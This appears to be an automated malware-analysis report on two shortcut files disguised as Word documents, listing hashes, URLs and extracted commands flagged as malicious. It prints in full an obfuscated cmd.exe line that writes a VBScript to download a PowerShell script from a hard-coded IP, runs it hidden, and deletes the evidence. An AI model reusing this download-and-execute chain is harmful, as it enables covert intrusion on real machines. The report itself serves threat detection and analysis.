| Hash | Hash Value |
|---|---|
| MD5 | 258aa2891f92620aa8540ab6ba13c9f4 |
| SHA1 | 2167099d63bf1d92b02241312f467a5acbf4f181 |
| SHA256 | a1dbae0dd3e1d72f649be1c8a999274a22127ed27165018af1d96b7d6eda9baa |
| SHA384 | 0cc2832d5b2c014cdfe468d809b2e21ee2b4c469cc10e05811bbe55465d616e4b4e7c2643c164894b44215cfa334cd28 |
| SHA512 | 5e4ab4a29737fbe010b3bf6bf46d57ba90293f7e51df64a599b9162363ba56c4f95c5b320c71ae5a1c46b4051bd5b4f28988c8ac7a80bbdfe42c1a8a48829857 |
| SSDeep | 48:V7PtJeQqTellc51WUrfAx7PUuuGJIEuqTelA51WUSxB1Bg/E7o/j27H:V7lJe7ellcn7i7suuGJIYelAnCT7J7H |
| TLSH | 0E42AF8036E86304F2B2BE3DDE3A5B404537BAD0EE35839C8A10DC1D1966611CD74F36 |
| Name | Value |
|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/angeldogsled.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\i8d1u.ps1",2 > %TEMP%\xw.vbs && cscript //b %TEMP%\xw.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\i8d1u.ps1 && del %TEMP%\xw.vbs %TEMP%\i8d1u.ps1" |
| URLs in VB Code - #1 | http://193.169.194.86/krr4g/angeldogsled.ps1 |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1 IconLocation: imageres.dll" |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1" |
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/philanthropyephyra.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ALZrzi.ps1",2 > %TEMP%\vVy.vbs && cscript //b %TEMP%\vVy.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ALZrzi.ps1 && del %TEMP%\vVy.vbs %TEMP%\ALZrzi.ps1" |
| URLs in VB Code - #1 | http://193.169.194.86/krr4g/philanthropyephyra.ps1 |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1 IconLocation: imageres.dll" |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1" |

| Name | Value | Verdict | Location |
|---|---|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/angeldogsled.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\i8d1u.ps1",2 > %TEMP%\xw.vbs && cscript //b %TEMP%\xw.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\i8d1u.ps1 && del %TEMP%\xw.vbs %TEMP%\i8d1u.ps1" | Malicious | 258aa2891f92620aa8540ab6ba13c9f4 > SPYSOK_mayna.docx.lnk |
| URLs in VB Code - #1 | http://193.169.194.86/krr4g/angeldogsled.ps1 | | 258aa2891f92620aa8540ab6ba13c9f4 > SPYSOK_mayna.docx.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1 IconLocation: imageres.dll" | Malicious | 258aa2891f92620aa8540ab6ba13c9f4 > SPYSOK_mayna.docx.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1" | Malicious | 258aa2891f92620aa8540ab6ba13c9f4 > SPYSOK_mayna.docx.lnk > LNK CommandLine > [PowerShell Command] |
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/philanthropyephyra.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ALZrzi.ps1",2 > %TEMP%\vVy.vbs && cscript //b %TEMP%\vVy.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ALZrzi.ps1 && del %TEMP%\vVy.vbs %TEMP%\ALZrzi.ps1" | Malicious | 258aa2891f92620aa8540ab6ba13c9f4 > NAKAZ_MO_perevirka_mayna.docx.lnk |
| URLs in VB Code - #1 | http://193.169.194.86/krr4g/philanthropyephyra.ps1 | | 258aa2891f92620aa8540ab6ba13c9f4 > NAKAZ_MO_perevirka_mayna.docx.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1 IconLocation: imageres.dll" | Malicious | 258aa2891f92620aa8540ab6ba13c9f4 > NAKAZ_MO_perevirka_mayna.docx.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1" | Malicious | 258aa2891f92620aa8540ab6ba13c9f4 > NAKAZ_MO_perevirka_mayna.docx.lnk > LNK CommandLine > [PowerShell Command] |